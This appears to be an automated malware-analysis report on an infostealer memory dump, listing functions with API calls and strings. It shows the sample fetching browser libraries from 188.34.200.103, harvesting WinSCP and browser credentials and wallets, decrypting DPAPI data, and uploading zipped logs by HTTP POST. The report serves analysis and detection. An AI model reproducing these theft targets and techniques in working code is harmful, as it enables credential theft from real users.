GetKeyboardLayoutList.USER32(00000000,00000000,00000018), ref: 0045F9AD
LocalAlloc.KERNEL32(00000040,00000000), ref: 0045F9BC
GetKeyboardLayoutList.USER32(?,00000000), ref: 0045F9C9
GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0045F9F3
_memset.LIBCMT ref: 0045FA73

Part of subcall function 00404C99: __EH_prolog3.LIBCMT ref: 00404CA0

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

LocalFree.KERNEL32(?), ref: 0045FA92

Strings

/ , xrefs: 0045F9FE

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: H_prolog3KeyboardLayoutListLocal_memmove$AllocFreeInfoLocale_memset
String ID: /
API String ID: 680995659-4001269591
Opcode ID: fca272049d8a64a803fa8726c3363da24dcf8324e2295ad06a9808b788d5f4ee
Instruction ID: ebc50c4569753f4ae8d6dd9b94eee5d4375e5fcf9b0d26fe206f9ec9c13f0136
Opcode Fuzzy Hash: fca272049d8a64a803fa8726c3363da24dcf8324e2295ad06a9808b788d5f4ee
Instruction Fuzzy Hash: F44141B1900209AFDB10EF95C885AEEBBB8FF58305F50442FF905E6281D7785A49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00465C58, Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 462COMMON

Download Yara Rule

Strings

UT, xrefs: 00465F58

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID: UT
API String ID: 0-894488996
Opcode ID: 3c7017aff735e0097fdde07c04880b827d42ebfe4733803772b185d891346e92
Instruction ID: 3861737f4131847f7d7681eb4d2b8830ec5397b5b8f4cdf9003779686283e3f4
Opcode Fuzzy Hash: 3c7017aff735e0097fdde07c04880b827d42ebfe4733803772b185d891346e92
Instruction Fuzzy Hash: ED02F170A043888BDF25DFA8C8907EE7BB5AF55304F14446FD849AF346E6388945CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0040F881, Relevance: 9.1, APIs: 6, Instructions: 86processCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040F8AE

Part of subcall function 0046949E: __FF_MSGBANNER.LIBCMT ref: 004694B7
Part of subcall function 0046949E: __NMSG_WRITE.LIBCMT ref: 004694BE
Part of subcall function 0046949E: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,00467640,00000001,00000000,?,?,?,0046769E,00402DA3), ref: 004694E3

CreateToolhelp32Snapshot.KERNEL32 ref: 0040F8C1
CloseHandle.KERNEL32(00000000,00000002,00000000,?,0049B0CC,00000000), ref: 0040F8CE
Process32First.KERNEL32(?,?), ref: 0040F8DF
Process32Next.KERNEL32 ref: 0040F940
FindCloseChangeNotification.KERNEL32(?,00000002,00000000,?,0049B0CC,00000000), ref: 0040F94C

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseProcess32$AllocateChangeCreateFindFirstHandleHeapNextNotificationSnapshotToolhelp32_malloc
String ID:
API String ID: 2639979032-0
Opcode ID: 725c43eaf8a4bbad2364d2acf98c58f0b28590c9f69fa959d1d4de44ae24c9b2
Instruction ID: db23c6cec75c505437726e574e49ed5c75040cd14c1b2d0783e8c8df41269829
Opcode Fuzzy Hash: 725c43eaf8a4bbad2364d2acf98c58f0b28590c9f69fa959d1d4de44ae24c9b2
Instruction Fuzzy Hash: 5721BF719042589ADB309FB5DC81BEEBBBAFF15318F20413FD855A7282E7395909CB05

Uniqueness

Uniqueness Score: -1.00%

Function 00442489, Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 468COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004425BA
_memset.LIBCMT ref: 00442752

Strings

:memory:, xrefs: 004424D4
F@B, xrefs: 004425FA, 0044261C, 004428DF, 004428F2

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memmove_memset
String ID: :memory:$F@B
API String ID: 3555123492-33899371
Opcode ID: 87745c7d2c2a4e0775ccd4723815544a4bddde217433c4695f536c5b6078dbd3
Instruction ID: bf3b9ab26e30bf1c6986341982e446c835fadc4d3ba8798bcb033ebbf068b2cb
Opcode Fuzzy Hash: 87745c7d2c2a4e0775ccd4723815544a4bddde217433c4695f536c5b6078dbd3
Instruction Fuzzy Hash: F602BB70A00205DFEB25DF64CA45AAEBBB0FF54304F64416FF855AB252D7B8D980CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040EBCB, Relevance: 6.0, APIs: 4, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040EBEE
LocalAlloc.KERNEL32(00000040,?), ref: 0040EC06
_memmove.LIBCMT ref: 0040EC1B
LocalFree.KERNEL32(?), ref: 0040EC27

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Local$AllocCryptDataFreeUnprotect_memmove
String ID:
API String ID: 3008826695-0
Opcode ID: 2e21a8d27fdfff7232672f31a8928a13f293791f13c93ce0950a323e37e01a9f
Instruction ID: 533385069dfd4ee9e78909f8d5a97e7220bd51e141bcaac38ed2d7d1285ab8c0
Opcode Fuzzy Hash: 2e21a8d27fdfff7232672f31a8928a13f293791f13c93ce0950a323e37e01a9f
Instruction Fuzzy Hash: B30162B6900218AFCB00EFE9DC498DEBBB9FF48704B14486AF901E7210E7759A50CB50

Uniqueness

Uniqueness Score: -1.00%

Function 004625F7, Relevance: 4.6, APIs: 3, Instructions: 72fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00462601

Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000011,00000000,00000000,000003E8,?,00000000,?,?,?,0040DF45,?,?,?), ref: 00462276
Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,0040DF45,?,?,?,?), ref: 004622A5

FindFirstFileW.KERNEL32(00000000,?,?,?,00000298,0040CF5D,?), ref: 0046263A
FindNextFileW.KERNEL32(?,?,00000001,00000000,?,?,00000001,00000000), ref: 004626CB

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ByteCharFileFindMultiWide$FirstH_prolog3_Next
String ID:
API String ID: 1519118924-0
Opcode ID: e0facc31fb44c86b85d9735f083605fe296d7d7d7841cebcfd0fe1e28310b88d
Instruction ID: 0b87ea419238332d54dcb1d30181f3322be443f13eb6f922783ccfb4c27e5f02
Opcode Fuzzy Hash: e0facc31fb44c86b85d9735f083605fe296d7d7d7841cebcfd0fe1e28310b88d
Instruction Fuzzy Hash: E9314D71D00209AFCB11DFA9C988ADEBBB8AF55304F00859FE415A7251EB789B44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3EE, Relevance: 176.7, APIs: 46, Strings: 54, Instructions: 1660COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(044E1058,00000000,00000001,00000000,00000000), ref: 0040B3F8
SetCurrentDirectoryA.KERNEL32(044E1058), ref: 0040B40B
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040B42D

Part of subcall function 0040DB5B: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0040DB82
Part of subcall function 0040DB5B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040DB9E
Part of subcall function 0040DB5B: CloseHandle.KERNEL32(00000000), ref: 0040DBA5

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Part of subcall function 0040DA1F: _memset.LIBCMT ref: 0040DA29

Part of subcall function 00404C99: __EH_prolog3.LIBCMT ref: 00404CA0

CreateDirectoryA.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,00000001,?,00000001,?,?,?,00000001), ref: 0040B87D
CreateDirectoryA.KERNEL32(00000000,?,?,?,?,?,?,?,00000001,?,?,?,00000001,?,00000001), ref: 0040B8A7
CreateDirectoryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?,?,00000001), ref: 0040B8D1
CreateDirectoryA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0040B90B
CreateDirectoryA.KERNEL32(00000000), ref: 0040B935
CreateDirectoryA.KERNEL32(00000000), ref: 0040B967

Strings

Local Time: , xrefs: 0040BF33
TimeZone: , xrefs: 0040BFAB
CPU Count: , xrefs: 0040C0DF
.zip, xrefs: 0040C704
*.*, xrefs: 0040C77B
", xrefs: 0040B72F
188.34.200.103, xrefs: 0040B504, 0040B595, 0040B622, 0040B6AF, 0040B73C, 0040B7C9, 0040C842, 0040C84D, 0040C852
/mozglue.dll, xrefs: 0040B58D
[Software], xrefs: 0040C2B6
\files\, xrefs: 0040C420
Windows: , xrefs: 0040BC0E
C:\ProgramData, xrefs: 0040C8FB
Display Resolution: , xrefs: 0040BDCB
^", xrefs: 0040B7BC
\files\Wallets, xrefs: 0040C406
VideoCard: , xrefs: 0040C1D0
[Hardware], xrefs: 0040C010
User Name: , xrefs: 0040BD53
T,, xrefs: 0040B5B6
\freebl3.dll, xrefs: 0040B543
files\information.txt, xrefs: 0040BA32
GUID: %s, xrefs: 0040BB1F
Version: %s, xrefs: 0040BA9A
Display Language: , xrefs: 0040BE43
\msvcp140.dll, xrefs: 0040B65D
\nss3.dll, xrefs: 0040B6EA
\softokn3.dll, xrefs: 0040B777
Keyboard Languages: , xrefs: 0040BEBB
/nss3.dll, xrefs: 0040B6A7
Path: %s , xrefs: 0040BB99
/msvcp140.dll, xrefs: 0040B61A
F, xrefs: 0040C847
/vcruntime140.dll, xrefs: 0040B7C1
ccount, xrefs: 0040C671
Processor: , xrefs: 0040C067
MachineID: %s, xrefs: 0040BAE6
logs, xrefs: 0040C815
Computer Name: , xrefs: 0040BCD6
Work Dir: %s , xrefs: 0040BBCD
,, xrefs: 0040B529
x#, xrefs: 0040B6A2
Date: %s, xrefs: 0040BABC
[Processes], xrefs: 0040C230
:+, xrefs: 0040B6D0
\mozglue.dll, xrefs: 0040B5D0
/softokn3.dll, xrefs: 0040B734
\files, xrefs: 0040B411, 0040C3C2, 0040C789
*, xrefs: 0040B7EA
RAM: , xrefs: 0040C157
\vcruntime140.dll, xrefs: 0040B804
C%, xrefs: 0040B44D
J%, xrefs: 0040B4D0
/freebl3.dll, xrefs: 0040B4FC
HWID: %s, xrefs: 0040BB58

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateDirectory$File$CloseCurrentH_prolog3HandleWrite_memmove_memset
String ID: [Software]$*.*$.zip$/freebl3.dll$/mozglue.dll$/msvcp140.dll$/nss3.dll$/softokn3.dll$/vcruntime140.dll$188.34.200.103$C:\ProgramData$CPU Count: $Computer Name: $Date: %s$Display Language: $Display Resolution: $F$GUID: %s$HWID: %s$Keyboard Languages: $Local Time: $MachineID: %s$Path: %s $Processor: $RAM: $TimeZone: $User Name: $Version: %s$VideoCard: $Windows: $Work Dir: %s $[Hardware]$[Processes]$\files$\files\$\files\Wallets$\freebl3.dll$\mozglue.dll$\msvcp140.dll$\nss3.dll$\softokn3.dll$\vcruntime140.dll$ccount$files\information.txt$logs$ *$:+$C%$J%$T,$^"$x#$"$,
API String ID: 2752366107-80144197
Opcode ID: b8e21d82612c8b4727ae08f7b4a616d873e217a9f84ad5c1cedf6b7795abb49c
Instruction ID: 88b6f0bcc4ccab69488aa743f7a3b3b66addb3fa89cf5dd1017f7a6447548ab9
Opcode Fuzzy Hash: b8e21d82612c8b4727ae08f7b4a616d873e217a9f84ad5c1cedf6b7795abb49c
Instruction Fuzzy Hash: 64D23EB1804148AEEB14EB95DD89EDE7B7CEF15304F0000BEF505B71D2DA785A88DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 004136A5, Relevance: 73.8, APIs: 27, Strings: 15, Instructions: 298registryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004136C4
_memset.LIBCMT ref: 004136E4
_memset.LIBCMT ref: 00413704
_memset.LIBCMT ref: 00413718
_memset.LIBCMT ref: 00413726
RegOpenKeyExW.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0041374C
RegGetValueW.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 00413772
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 00413784
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 0041379A
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 004137AB
RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 004137C1
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 004137E2
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000034), ref: 004137F8
_fprintf.LIBCMT ref: 00413851
_fprintf.LIBCMT ref: 0041385C
RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,?,00000001,00000000,passwords.txt), ref: 00413881
_fprintf.LIBCMT ref: 00413890
RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?,?,?,?,00000001,00000000,passwords.txt), ref: 004138BC
_fprintf.LIBCMT ref: 004138E4
_fprintf.LIBCMT ref: 004138FF
_fprintf.LIBCMT ref: 0041390C
RegGetValueA.ADVAPI32(?,?,UserName,00000002,00000000,?,?,?,?,?,?,00000001,00000000,passwords.txt), ref: 00413930
_fprintf.LIBCMT ref: 0041393F
RegGetValueA.ADVAPI32(?,?,Password,00000002,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00413971

Part of subcall function 0041322B: __EH_prolog3.LIBCMT ref: 00413244
Part of subcall function 0041322B: GetProcessHeap.KERNEL32(00000008,?,0000002C), ref: 004132B0
Part of subcall function 0041322B: HeapAlloc.KERNEL32(00000000), ref: 004132B3
Part of subcall function 0041322B: GetProcessHeap.KERNEL32(00000000,?), ref: 004132C9
Part of subcall function 0041322B: HeapFree.KERNEL32(00000000), ref: 004132CC

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

_fprintf.LIBCMT ref: 004139C3
RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 004139EA
RegCloseKey.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,00000001,00000000,passwords.txt), ref: 00413A17

Strings

Host: , xrefs: 00413856
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 00413741
HostName, xrefs: 00413872
Login: , xrefs: 00413906
UserName, xrefs: 00413921
Software\Martin Prikryl\WinSCP 2\Sessions, xrefs: 004137BB
UseMasterPassword, xrefs: 00413765
Password: %s, xrefs: 004139BD
:%s, xrefs: 004138DE
Soft: WinSCP, xrefs: 0041384B
Password, xrefs: 0041395F
PortNumber, xrefs: 004138A6
Security, xrefs: 0041376A
:22, xrefs: 004138F9
passwords.txt, xrefs: 00413805

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$CloseValue$Heap_memset$EnumH_prolog3OpenProcess_memmove$AllocFree
String ID: Login: $Password: %s$:%s$:22$Host: $HostName$Password$PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 2505226420-1600676177
Opcode ID: b1f439b427cf368186053285f9086994e6cee25bd7459c4094bca62913783d5c
Instruction ID: 549c353064c69772ae4d8435066ebdf221e70eb495c398f864a2d8b7e7bc5e18
Opcode Fuzzy Hash: b1f439b427cf368186053285f9086994e6cee25bd7459c4094bca62913783d5c
Instruction Fuzzy Hash: 06B13DB190420DEEDB11EF90DC81EEE77BCFF04304F14052BF915A6191EB799A458B69

Uniqueness

Uniqueness Score: -1.00%

Function 004125BF, Relevance: 47.5, APIs: 22, Strings: 5, Instructions: 257filestringCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004125DE
GetCurrentDirectoryA.KERNEL32(00000104,?,00000020), ref: 0041260D
lstrcatA.KERNEL32(?,\temp), ref: 0041261C
CopyFileA.KERNEL32(?,?,00000001), ref: 00412629
DeleteFileA.KERNEL32(?), ref: 00412897

Part of subcall function 004695EE: __fsopen.LIBCMT ref: 004695FB

Part of subcall function 00412474: __EH_prolog3_GS.LIBCMT ref: 0041247B
Part of subcall function 00412474: _memset.LIBCMT ref: 004124D6
Part of subcall function 00412474: LocalAlloc.KERNEL32 ref: 00412511

_fprintf.LIBCMT ref: 0041271F
_fprintf.LIBCMT ref: 0041272D
_fprintf.LIBCMT ref: 00412734
_fprintf.LIBCMT ref: 00412742
_fprintf.LIBCMT ref: 00412749
_fprintf.LIBCMT ref: 00412757
_fprintf.LIBCMT ref: 0041275E
_fprintf.LIBCMT ref: 004127A1
_fprintf.LIBCMT ref: 004127B3
_fprintf.LIBCMT ref: 004127C1

Part of subcall function 0046835C: __lock_file.LIBCMT ref: 004683A3
Part of subcall function 0046835C: __stbuf.LIBCMT ref: 00468427
Part of subcall function 0046835C: __output_l.LIBCMT ref: 00468437
Part of subcall function 0046835C: __ftbuf.LIBCMT ref: 00468441

_fprintf.LIBCMT ref: 004127C8
_fprintf.LIBCMT ref: 004127D6
_fprintf.LIBCMT ref: 004127DD
_fprintf.LIBCMT ref: 004127EB
_fprintf.LIBCMT ref: 004127F2
_fprintf.LIBCMT ref: 00412835
_fprintf.LIBCMT ref: 0041284F

Strings

Login: %s, xrefs: 00412751, 004127E5
Soft: %s, xrefs: 00412727, 004127BB
Host: %s, xrefs: 0041273C, 004127D0
Password: %s, xrefs: 0041279B, 0041282F
\temp, xrefs: 00412613

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _fprintf$File$AllocCopyCurrentDeleteDirectoryH_prolog3H_prolog3_Local__fsopen__ftbuf__lock_file__output_l__stbuf_memsetlstrcat
String ID: Host: %s$Login: %s$Password: %s$Soft: %s$\temp
API String ID: 742969294-2676079308
Opcode ID: 9b8e54e3261377f01fd947e897685e197660b70fac05e2d73e00e043c6c5702f
Instruction ID: d9dc442428994d9dd436ba45e4c568b9849aac67de50ca6e8163ccbd64d1daf8
Opcode Fuzzy Hash: 9b8e54e3261377f01fd947e897685e197660b70fac05e2d73e00e043c6c5702f
Instruction Fuzzy Hash: E6817072900218AFDF05BBA19D02EEF7768EF04718F54052EF900B6292EE795D51876E

Uniqueness

Uniqueness Score: -1.00%

Function 0040E48C, Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 277networkCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0040E4AB
__cftof.LIBCMT ref: 0040E56D
InternetOpenA.WININET(0000002F,00000000,?,00000000,00000000), ref: 0040E588
InternetSetOptionA.WININET(00000000,00000041,?,00000004), ref: 0040E5AB
InternetConnectA.WININET(00000000,00000000,00000050,?,?,00000003,00000000,00000001), ref: 0040E5CC
InternetSetOptionA.WININET(00000000,00000041,00000001,00000000), ref: 0040E5E5
HttpOpenRequestA.WININET(00000000,POST,?,00000000,00000000,00000000,00400000,00000001), ref: 0040E608
HttpAddRequestHeadersA.WININET(00000000,?,?,20000000), ref: 0040E662
__itow_s.LIBCMT ref: 0040E676
HttpAddRequestHeadersA.WININET(00000000,?,?,20000000), ref: 0040E6C5
HttpSendRequestA.WININET(00000000,00000000,00000000,?,?), ref: 0040E6D3
HttpQueryInfoA.WININET(00000000,0000002E,?,00000010,00000000), ref: 0040E6F0
InternetCloseHandle.WININET(00000000), ref: 0040E6FB
__cftof.LIBCMT ref: 0040E727

Part of subcall function 0046910A: __mbsnbcpy_s_l.LIBCMT ref: 0046911D

InternetOpenUrlA.WININET(00000010,00000000,00000000,00000000,00400000,00000000), ref: 0040E73B
InternetCloseHandle.WININET(00000000), ref: 0040E750
InternetCloseHandle.WININET(?), ref: 0040E768
InternetCloseHandle.WININET(00000010), ref: 0040E771

Part of subcall function 0040DDDE: __EH_prolog3.LIBCMT ref: 0040DDFD
Part of subcall function 0040DDDE: InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 0040DE37
Part of subcall function 0040DDDE: InternetReadFile.WININET(00000010,?,000003E8,?), ref: 0040DE51
Part of subcall function 0040DDDE: _memmove.LIBCMT ref: 0040DE86
Part of subcall function 0040DDDE: _memset.LIBCMT ref: 0040DEB7
Part of subcall function 0040DDDE: HttpQueryInfoA.WININET(00000010,0000001D,?,?,00000000), ref: 0040DECD

Strings

Content-Length: , xrefs: 0040E680
POST, xrefs: 0040E602
http://, xrefs: 0040E50B
http, xrefs: 0040E70B
--, xrefs: 0040E4E8
Content-Type: multipart/form-data; boundary=, xrefs: 0040E622

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$Http$CloseHandleRequest$Open$FileH_prolog3HeadersInfoOptionQuery__cftof$ConnectPointerReadSend__itow_s__mbsnbcpy_s_l_memmove_memset
String ID: --$Content-Length: $Content-Type: multipart/form-data; boundary=$POST$http$http://
API String ID: 3912242280-1095625359
Opcode ID: e1cd21aa4b02c6298cb15996f87961eba4a44cdbc999e19e9171f47c45089922
Instruction ID: 4e9fe46b64a5a68344a2cd1d8430ce8f56eab6cb6f9070305da0805329ea0935
Opcode Fuzzy Hash: e1cd21aa4b02c6298cb15996f87961eba4a44cdbc999e19e9171f47c45089922
Instruction Fuzzy Hash: 6CA17171500208BFEB11EFA5CC85EEE77ACEB54704F40083EF902A71C1DBB99A458B69

Uniqueness

Uniqueness Score: -1.00%

Function 0040A5EA, Relevance: 39.3, APIs: 8, Strings: 14, Instructions: 800COMMON

Download Yara Rule

APIs

_strtok.LIBCMT ref: 0040A64E
_strtok.LIBCMT ref: 0040A710

Part of subcall function 00404E80: __EH_prolog3.LIBCMT ref: 00404E87

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

__wgetenv.LIBCMT ref: 0040A876
__wgetenv.LIBCMT ref: 0040A914
GetLogicalDriveStringsA.KERNEL32 ref: 0040AB55
_strtok.LIBCMT ref: 0040AB8A
GetDriveTypeA.KERNEL32(?,00000001,00000000,?,?,?,?,?), ref: 0040ABF0

Part of subcall function 0045F3B7: GetUserNameA.ADVAPI32(?,?), ref: 0045F3EC

Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000011,00000000,00000000,000003E8,?,00000000,?,?,?,0040DF45,?,?,?), ref: 00462276
Part of subcall function 00462247: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,0040DF45,?,?,?,?), ref: 004622A5

_strtok.LIBCMT ref: 0040AFC7

Strings

%DRIVE_FIXED%, xrefs: 0040ABF7, 0040AC30
%LOCALAPPDATA%, xrefs: 0040A8D7, 0040A8DC, 0040A903
C:\Users\, xrefs: 0040A7A9, 0040A7B1, 0040A833, 0040A9BD, 0040AAA9
%DOCUMENTS%, xrefs: 0040AA61, 0040AA66, 0040AA8D
%APPDATA%, xrefs: 0040A839, 0040A83E, 0040A865
\Documents, xrefs: 0040AAB7
\Desktop, xrefs: 0040A9CB
.zip, xrefs: 0040AB92
APPDATA, xrefs: 0040A86D
LOCALAPPDATA, xrefs: 0040A90B
%C%, xrefs: 0040AE0B, 0040AE54
%DRIVE_REMOVABLE%, xrefs: 0040AD02, 0040AD39
%DESKTOP%, xrefs: 0040A975, 0040A97A, 0040A9A1
C:\, xrefs: 0040AE32

Memory Dump Source

Source File: 00000019.00000002.452249201.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _strtok$ByteCharDriveMultiWide__wgetenv_memmove$H_prolog3LogicalNameStringsTypeUser
String ID: %APPDATA%$%C%$%DESKTOP%$%DOCUMENTS%$%DRIVE_FIXED%$%DRIVE_REMOVABLE%$%LOCALAPPDATA%$.zip$APPDATA$C:\$C:\Users\$LOCALAPPDATA$\Desktop$\Documents
API String ID: 1597689408-2603015269
Opcode ID: 632270b4dab062be37ade7027298caa1da4555e4327131859afd6fb9126e7969
Instruction ID: b9d34dd97d4348ad34502de30f085cdaf849ac27cdfa78e59730d2519d3a32bf
Opcode Fuzzy Hash: 632270b4dab062be37ade7027298caa1da4555e4327131859afd6fb9126e7969
Instruction Fuzzy Hash: 1662C871900248EEDB14EFA8C946BEE7B78AF15308F14406EF905A71C2DB795B09C7A7

Uniqueness

Uniqueness Score: -1.00%

Function 00414DAB, Relevance: 35.4, APIs: 8, Strings: 12, Instructions: 430fileCOMMON

Download Yara Rule

APIs

__wgetenv.LIBCMT ref: 00414DB0

Part of subcall function 00404C99: __EH_prolog3.LIBCMT ref: 00404CA0

Part of subcall function 004046B4: _memmove.LIBCMT ref: 004046D6

Part of subcall function 00402CD0: _memmove.LIBCMT ref: 00402CEF

Part of subcall function 00414747: __EH_prolog3_catch_GS.LIBCMT ref: 00414751

__wgetenv.LIBCMT ref: 00414E55

Part of subcall function 00468D4A: _strnlen.LIBCMT ref: 00468D7F
Part of subcall function 00468D4A: __lock.LIBCMT ref: 00468D90
Part of subcall function 00468D4A: __getenv_helper_nolock.LIBCMT ref: 00468D9D

__wgetenv.LIBCMT ref: 00414F09

Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414A32
Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414A42
Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414B47
Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414B5A
Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414B7D
Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414B8E
Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414BB2
Part of subcall function 00414747: _fprintf.LIBCMT ref: 00414BBE

Part of subcall function 0040F96F: OpenProcess.KERNEL32(001FFFFF,00000000,00000000,?,?,?,0049B0CC,00000000,?,00414FC4), ref: 0040F994
Part of subcall function 0040F96F: TerminateProcess.KERNEL32(00000000,00000000,?,?,?,0049B0CC,00000000,?,00414FC4), ref: 0040F9A4
Part of subcall function 0040F96F: CloseHandle.KERNEL32(00000000,?,?,?,0049B0CC,00000000,?,00414FC4), ref: 0040F9AB
Part of subcall function 0040F96F: _free.LIBCMT ref: 0040F9B9

Part of subcall function 00413BE0: __EH_prolog3.LIBCMT ref: 00413BFF
Part of subcall function 00413BE0: _memset.LIBCMT ref: 00413C29
Part of subcall function 00413BE0: lstrcatA.KERNEL32(?,?,?,0000001A,?,?,00000014), ref: 00413C4A
Part of subcall function 00413BE0: _memset.LIBCMT ref: 00413C55
Part of subcall function 00413BE0: lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000014), ref: 00413C68
Part of subcall function 00413BE0: lstrcatA.KERNEL32(?,\Local State,?,?,?,?,?,00000014), ref: 00413C76

Part of subcall function 00413A4A: __EH_prolog3.LIBCMT ref: 00413A69
Part of subcall function 00413A4A: _memset.LIBCMT ref: 00413A93
Part of subcall function 00413A4A: lstrcatA.KERNEL32(?,?,?,0000001C,?,?,00000014), ref: 00413AB4
Part of subcall function 00413A4A: _memset.LIBCMT ref: 00413ABF
Part of subcall function 00413A4A: lstrcatA.KERNEL32(?,?,?,?,?,?,?,00000014), ref: 00413AD2
Part of subcall function 00413A4A: lstrcatA.KERNEL32(?,004867F4,?,?,?,?,?,00000014), ref: 00413AE0
Part of subcall function 00413A4A: lstrcatA.KERNEL32(?,?,?,?,?,?,00000014), ref: 00413AEF

CreateDirectoryA.KERNEL32(00000000), ref: 004152E7
_memset.LIBCMT ref: 00415302
__wgetenv.LIBCMT ref: 0041530C
DeleteFileA.KERNEL32(00488C54,?,004866C4), ref: 004153AA
DeleteFileA.KERNEL32(00488C50,?,004866C4), ref: 004153B1

Part of subcall function 0041442A: __EH_prolog3.LIBCMT ref: 00414449
Part of subcall function 0041442A: __wgetenv.LIBCMT ref: 00414455
Part of subcall function 0041442A: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?), ref: 00414501
Part of subcall function 0041442A: CreateDirectoryA.KERNEL32(00000000,00000000,?,00000001,00000000,?,?,?), ref: 00414538

Part of subcall function 0040E962: _memset.LIBCMT ref: 0040E983
Part of subcall function 0040E962: GetVersionExA.KERNEL32(?), ref: 0040E99C

Part of subcall function 00412190: LoadLibraryA.KERNEL32 ref: 004121C1
Part of subcall function 00412190: GetProcAddress.KERNEL32(00000000), ref: 004121E2
Part of subcall function 00412190: GetProcAddress.KERNEL32(00000000), ref: 004121F0
Part of subcall function 00412190: GetProcAddress.KERNEL32(00000000), ref: 004121FE
